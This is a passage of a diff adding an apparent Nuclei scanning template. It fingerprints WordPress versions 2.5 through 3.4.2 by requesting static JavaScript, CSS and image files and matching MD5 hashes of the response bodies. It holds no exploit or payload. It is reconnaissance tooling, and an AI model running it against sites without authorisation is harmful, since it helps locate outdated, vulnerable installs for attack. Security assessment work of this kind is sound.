2.7 - 2.7.1 + dsl: + - "(\"f4618e213871a41e023e295367d932ce\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"04a74a9472b373a35d38d488259072dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.dialog.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"28c3ee6cd4928b4023a6efc0d0b0bd1f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"6cd7537598b6a62b1c49f7642ce20ea0\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"208575d150c2df5441725b768a5f8465\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"58e37a6a9905f9aa09170df90c5517e2\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2810e7ba77f48226445fe67f00e0278c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.widget.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"5a2daaad606706ff30162cd91f4e52ae\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"0627e92c9275c569f8eb69485f91600f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.tabs.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"087072e535830ca3ba52af113a14f1c7\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f1ec6bf7c91dba53f793c4e0b00b5b43\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"60baf0f868b3817860daede9d99266b3\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"92321373c9dcad8d096abd76ba18c02d\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"db82282a162891af35802d19093f32d2\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"714e864501b632b248ad4653f942b433\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"79ba03ebbddfe85f3bab511b653426a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.mouse.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"20b9fd26e3ca272b473511601b7604d9\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b8cc842248a8e9f6ab905db47919ce91\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.selectable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9fe50669ab990a4b530d32cff4ec1269\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"778423eb2b5ec020eb01470c17c2d242\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"0590a2173096ae62a72f829988167ce9\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"bcb1ae0fac5fa2d18aa6b36ab65c59d3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.resizable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1c7ac560b262e562dec64427d6b6551a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"840edcdd83bd4b13b7f511cde103e2d3\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"44d86a9737e5214b713042621529aec1\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"5c04b89c0237cb4408d364b38d0888a2\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"11498ad77b63b676cabf446da36be84c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.sortable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"2694e10af5cbfbbcd54c76c72927cb4d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ee4315bdb09d4327d7c6144fc620a1eb\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"70425b8b665ce7069e2d3d2274a18302\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"8b26b1568a703a7ff4cc4653b4982c0a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"bed2e54175ca63cc0bec8a864831986f\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"ec1c962315b17de67bc40ff55b406063\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.button.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"7a293a0579a93cba3d1d06560b48e890\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"2e2303a422d6df8392601fe69fb33e90\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.droppable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"3c8749db46671da792bbdf1b4827110f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3ec22af31cb8d288bc930bae1540a9bf\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"9c34826f6918d94f8e2d0e92f8a603a2\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"422b880abd2de6c562ce1956ed6ba842\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/separator.gif" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"9636c1e228dc5d7c58ec2722a6d9ec23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/down_arrow.gif" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"7bbbc00f708a791dc4e674f9e21aa2ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/fade-butt.png" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/button_bg.png" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"8c9b1f0ee9deb6374983650edbd6ddfc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/butt2.png" + matchers: + - type: dsl + name: 2.7 - 3.2.1 + dsl: + - "(\"f8177b2875cc2f1988f3a8645edfddb8\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"8063404a9759063d641ebfa8247b42fb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/wpicons.png" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"968a7e190df87105abfa07fef2d3fe61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/img/toggle-arrow.png" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"e5064769584f17a701131db269226700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"6898c9d2f70705ee44ade16b719bdec7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink-rtl.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"82c0f4232973144f8ead47babec37954\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink-rtl.dev.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"71c5a295547703474a311da1fb8a5375\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink.dev.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"b98b951d96fa73562fecd5ddae985765\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/js/wplink.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"df344323225092a8ac4fe18dd3aadda9\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8ca64ed1952868df64573291d7510e24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/js/wplink.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a2cf78fd7dbfe9f0ddfd5416a8d41a96\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3b3d8b1cf11181517c34f9e99bf272d3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"29d1cde9c4907a89660c0f97dbbdbc7b\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"3ad85ded601480becdacc5b37d051a7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"f9b9af32ed5955188b95884c23a97710\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"08e782d86bb604d248af760965c44f9d\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"19af75a47678407c01b7bd89b514c382\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1d469fa64b12915edd13d68148453c72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e027ddfda419b05633c45aacd35d2792\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c93baaf77ab530218abdfb9d30bbb42f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"0e3febdb81a87285c18b37f9ca01e63a\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"48705f886f1714e4c4c130e5fa7443f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a3e3c3795fd7fd526c86a8f2fb82e7b4\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"feff33da67f435d20eab953db34d0c63\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"b26a9eb0910662acf803506350ddfd9e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install-rtl.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"994b061f1d4ef82fe4dda82e887fdebd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install-rtl.dev.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"79d3545aa4f635d3149694e840aa313e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"fd87273191560d2a4909d5a451e85223\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu-rtl.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"d21087ddbbd66002089743c75b3e9333\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"9c89cdcb450005439bfd953bc41d7650\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"67937f3a3e8e4b9eeaa5fe15c1cce63b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic-rtl.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e215ec4d06602d4ab70f906aec41a9ad\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f0745260a97915cdee9e8964521ba987\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b379a4aab078c4970c9b387cc8ccf77a\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"74e3bc0961e42685a1b2918ee21de19f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"cb467b50c6b9c2151d5767c3df8d56aa\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"f167446b6210eda62f730de80f2af755\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"fa538e7d2c3f867083940fe5ac32a9b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"104436a986b68884830b4fecf3fa3188\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"4844a6a0a6e0c14348b6987cf5ac1072\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"b1e23cf91b326d5c4bfb1eb2bc5395cb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh-rtl.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1032cbfcb279aff5069a3cc244d633a3\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"982751a4c494ed304013a96bc8e34711\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"eee458d5eaf8a119e8543f311b3b77ed\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"9626c77e24ce9dac516acb7871b1d5d3\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"fa538e7d2c3f867083940fe5ac32a9b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ms.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"bb8bd3b3f13e4ff26845a4a8f4f1a08d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b8dc31acbc73acb7349c56086424a474\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b8ba7a732b6bf241fcbcdfec837f9356\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4f9b48f621aeca56c45251b2e2d5617c\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"753a209aebc4de7802fe343880137ef6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"80ae5e0c796d5c27bada602b1bc75250\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"de44af67c75286108f1c54f03e658c4f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3203506a8b4bba0e83b097c3fc898bf9\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"caca2d1c6d7f70138a2cae7cff992f9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"ff2cc41b3ec965996608fc6a416c0d34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e97820effedd99f04729313203cc6a86\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a952db631dae4e612bb2d4a776920e34\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3b3df59dfdf298205b1df4f696aa1ef7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ms.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c471baf72aebed568505b44ba5a67b6e\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"345810a7e7c3119897bc4c50c26ef511\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"a3d224255ce340dc53f9fc3d61d17250\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"cd13af37f71a04a7377f9f068b40897b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c65c2422ca7ab18d77e4253e6561d257\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e39dd2d59cce29b66eaa73ae84f9eda4\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"b65dd37fb61228ea9b035aee471d0cdd\" == md5(body))" + - type: dsl + name: 2.8.3 - 2.8.6 + dsl: + - "(\"48705f886f1714e4c4c130e5fa7443f8\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.2 + dsl: + - "(\"f7d487f7084a44abbb9c73956cfff128\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"ecc45e15b82d9ba24fc97a649d2c3a1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"18de21bea2d949abecd1505d54f8c592\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"44c3a17e3475319c2607dc5961d65240\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"47929d6248ad91217aa50432e8073fd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"164ea0d8f1aeab1804d96101038bdc5f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"7c8a0c3eae1fe26740f3bb883104dd41\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3887de3f53f64e803efd5291040c4db1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"ead37a72366af126a95f6cc0222650d0\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"540967968ab10e20a3ccd1c24a59a891\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"db9fd0a12bc515842828b62ad6c58117\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"96ccb208109e6bd91bb186d3945b712c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"caca2d1c6d7f70138a2cae7cff992f9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install-rtl.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"bb15b10df11592f3c1e803132e07dde8\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"ff2cc41b3ec965996608fc6a416c0d34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9dc0dddf639df1f6f51abaa804dc7090\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"780263c635eb4e336dbc1dc6f2396abd\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"adcfdb7c1dbd61eeb89a208c1bc0fa0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c42cf458a0dce157c789d3ea0d537f3d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"d57884f6c537a8aae2d94f6691a88029\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ee25e4e0ed7f4daeea286350b91d0656\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-buttons.css" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"3105c2683699bc806904333deb52af38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-buttons.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"3e0233087e54900ed8cac50e14fde27e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d30181a63c565e4468e6fefab0d58bc6\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1381684254b5110789ee3462bd1dba96\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"63d50833c289dca64b69d94cd40ac8ca\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"80d691c90f4f53d4b8f10b7254a0aa6b\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"66ff790001351132589bb63a37a56351\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"7e2136d5e077774bb677dcf3576cb203\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/css/editimage-rtl.css" + matchers: + - type: dsl + name: 2.6 - 3.3.3 + dsl: + - "(\"9afbd20302a56bc9e0d7bcc5c3c61c7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"9dd84d5a159ba243f18568c223a534b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"48784cf4970b78b03ce5d6da9cac5621\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"019b69e24bd4ccfb538504501851c2cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.dev.js" + matchers: + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"b187c382589dac1006d284967d24c62d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"208d2715778f5e1f2086e5efba4be695\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/gallery.png" + matchers: + - type: dsl + name: 2.7 - 3.3.3 + dsl: + - "(\"1f35ba36cb43f1c5382a13e6941483df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c0c35687371b7c544d0b446e297a93d0\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b13382c0430cc27678f686cff7247fd3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"818c96b9e6a8a38edb7bd84ed9df9360\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"801c8ecf84caad5d51283aa273d9e5c6\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b1a44bb492d150ba2fc3ef091649a6ac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/embedded.png" + matchers: + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"1fad35f87373d2784de6c125ce3942ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/more_bug.gif" + matchers: + - type: dsl + name: 2.5 - 3.3.3 + dsl: + - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/page_bug.gif" + matchers: + - type: dsl + name: 2.5 - 3.3.3 + dsl: + - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/css/content.css" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"585d53dec7b08788b4e495da6814eacf\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"be695b0573d9ef0b904587313fd6096d\" == md5(body))" + - type: dsl + name: 2.5 - 2.8.6 + dsl: + - "(\"947de1cd730bff4b3cea0bc8c5ec1178\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/gray-star.png" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"bea6d3557d9c1b9e3d9044aa685f72c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/star.png" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"6c8273e7a485fb777314ea9d0b5a103b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/new-feature-pointer.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"b9a135aa45236114cfcb912588bbaf41\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/admin-flyouts.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ac4ce1abdb2814481f88b1d5289138b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/welcome-screen.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cbdc66a4da2be082ac6c7c35670de6ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/drag-and-drop.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"259572a5fa2e3ed4a48411e28fe7186f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/coediting.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d335598bfe9f059385fd1afdb9680757\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/help-screen.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8c952481d58a5263790cce713e2b7c4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/media-icon.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"159783652897f6b290d9a56a60f37492\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/logo-login.png" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f3473a97f55aac098f90e978181ae4d1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/upload.png" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"64f033ed3bb680dba682829fe46ac34a\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"11904681d8fc3a10d44a96acec2d9044\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"1585519d5f7f27cd872e9c1f74e7157a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c9a392cb6e9f1715c9150031b0f0fea3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4f5c825f9860c328cdd1b5b878971264\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"3566f3b34a5a24f0763900dd3cf410fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"773b68ebb25a383788c7080043b0350b\" == md5(body))" + - type: dsl + name: 3.2 - 